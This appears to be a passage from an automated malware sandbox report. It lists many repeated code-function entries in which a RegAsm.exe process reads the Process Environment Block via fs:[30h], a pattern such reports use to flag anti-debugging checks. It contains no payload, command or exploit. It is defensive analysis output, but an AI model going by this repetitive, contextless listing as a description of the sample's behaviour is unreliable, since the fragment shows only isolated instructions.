Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031952E2 mov eax, dword ptr fs:[00000030h] 6_2_031952E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03180115 mov eax, dword ptr fs:[00000030h] 6_2_03180115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov ecx, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F0124 mov eax, dword ptr fs:[00000030h] 6_2_030F0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C1131 mov eax, dword ptr fs:[00000030h] 6_2_030C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C1131 mov eax, dword ptr fs:[00000030h] 6_2_030C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195152 mov eax, dword ptr fs:[00000030h] 6_2_03195152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov ecx, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03154144 mov eax, dword ptr fs:[00000030h] 6_2_03154144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6154 mov eax, dword ptr fs:[00000030h] 6_2_030C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6154 mov eax, dword ptr fs:[00000030h] 6_2_030C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC156 mov eax, dword ptr fs:[00000030h] 6_2_030BC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7152 mov eax, dword ptr fs:[00000030h] 6_2_030C7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03159179 mov eax, dword ptr fs:[00000030h] 6_2_03159179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 mov eax, dword ptr fs:[00000030h] 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03117190 mov eax, dword ptr fs:[00000030h] 6_2_03117190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314019F mov eax, dword ptr fs:[00000030h] 6_2_0314019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03100185 mov eax, dword ptr fs:[00000030h] 6_2_03100185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA197 mov eax, dword ptr fs:[00000030h] 6_2_030BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C188 mov eax, dword ptr fs:[00000030h] 6_2_0317C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C188 mov eax, dword ptr fs:[00000030h] 6_2_0317C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031711A4 mov eax, dword ptr fs:[00000030h] 6_2_031711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DB1B0 mov eax, dword ptr fs:[00000030h] 6_2_030DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov ecx, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0313E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031951CB mov eax, dword ptr fs:[00000030h] 6_2_031951CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031861C3 mov eax, dword ptr fs:[00000030h] 6_2_031861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031861C3 mov eax, dword ptr fs:[00000030h] 6_2_031861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FD1D0 mov eax, dword ptr fs:[00000030h] 6_2_030FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FD1D0 mov ecx, dword ptr fs:[00000030h] 6_2_030FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E51EF mov eax, dword ptr fs:[00000030h] 6_2_030E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C51ED mov eax, dword ptr fs:[00000030h] 6_2_030C51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F01F8 mov eax, dword ptr fs:[00000030h] 6_2_030F01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031961E5 mov eax, dword ptr fs:[00000030h] 6_2_031961E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03144000 mov ecx, dword ptr fs:[00000030h] 6_2_03144000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE016 mov eax, dword ptr fs:[00000030h] 6_2_030DE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318903E mov eax, dword ptr fs:[00000030h] 6_2_0318903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA020 mov eax, dword ptr fs:[00000030h] 6_2_030BA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC020 mov eax, dword ptr fs:[00000030h] 6_2_030BC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316705E mov ebx, dword ptr fs:[00000030h] 6_2_0316705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316705E mov eax, dword ptr fs:[00000030h] 6_2_0316705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C2050 mov eax, dword ptr fs:[00000030h] 6_2_030C2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB052 mov eax, dword ptr fs:[00000030h] 6_2_030EB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D070 mov ecx, dword ptr fs:[00000030h] 6_2_0313D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195060 mov eax, dword ptr fs:[00000030h] 6_2_03195060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314106E mov eax, dword ptr fs:[00000030h] 6_2_0314106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov ecx, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1070 mov eax, dword ptr fs:[00000030h] 6_2_030D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EC073 mov eax, dword ptr fs:[00000030h] 6_2_030EC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C208A mov eax, dword ptr fs:[00000030h] 6_2_030C208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD08D mov eax, dword ptr fs:[00000030h] 6_2_030BD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F909C mov eax, dword ptr fs:[00000030h] 6_2_030F909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C5096 mov eax, dword ptr fs:[00000030h] 6_2_030C5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED090 mov eax, dword ptr fs:[00000030h] 6_2_030ED090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030ED090 mov eax, dword ptr fs:[00000030h] 6_2_030ED090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031860B8 mov eax, dword ptr fs:[00000030h] 6_2_031860B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031860B8 mov ecx, dword ptr fs:[00000030h] 6_2_031860B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031950D9 mov eax, dword ptr fs:[00000030h] 6_2_031950D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031420DE mov eax, dword ptr fs:[00000030h] 6_2_031420DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov ecx, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 mov eax, dword ptr fs:[00000030h] 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D0C0 mov eax, dword ptr fs:[00000030h] 6_2_0313D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D0C0 mov eax, dword ptr fs:[00000030h] 6_2_0313D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E90DB mov eax, dword ptr fs:[00000030h] 6_2_030E90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031020F0 mov ecx, dword ptr fs:[00000030h] 6_2_031020F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C80E9 mov eax, dword ptr fs:[00000030h] 6_2_030C80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA0E3 mov ecx, dword ptr fs:[00000030h] 6_2_030BA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E50E4 mov eax, dword ptr fs:[00000030h] 6_2_030E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E50E4 mov ecx, dword ptr fs:[00000030h] 6_2_030E50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC0F0 mov eax, dword ptr fs:[00000030h] 6_2_030BC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C5702 mov eax, dword ptr fs:[00000030h] 6_2_030C5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7703 mov eax, dword ptr fs:[00000030h] 6_2_030C7703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC700 mov eax, dword ptr fs:[00000030h] 6_2_030FC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FF71F mov eax, dword ptr fs:[00000030h] 6_2_030FF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0710 mov eax, dword ptr fs:[00000030h] 6_2_030C0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F0710 mov eax, dword ptr fs:[00000030h] 6_2_030F0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313C730 mov eax, dword ptr fs:[00000030h] 6_2_0313C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B73C mov eax, dword ptr fs:[00000030h] 6_2_0319B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C3720 mov eax, dword ptr fs:[00000030h] 6_2_030C3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DF720 mov eax, dword ptr fs:[00000030h] 6_2_030DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FC720 mov eax, dword ptr fs:[00000030h] 6_2_030FC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F273C mov eax, dword ptr fs:[00000030h] 6_2_030F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F273C mov ecx, dword ptr fs:[00000030h] 6_2_030F273C
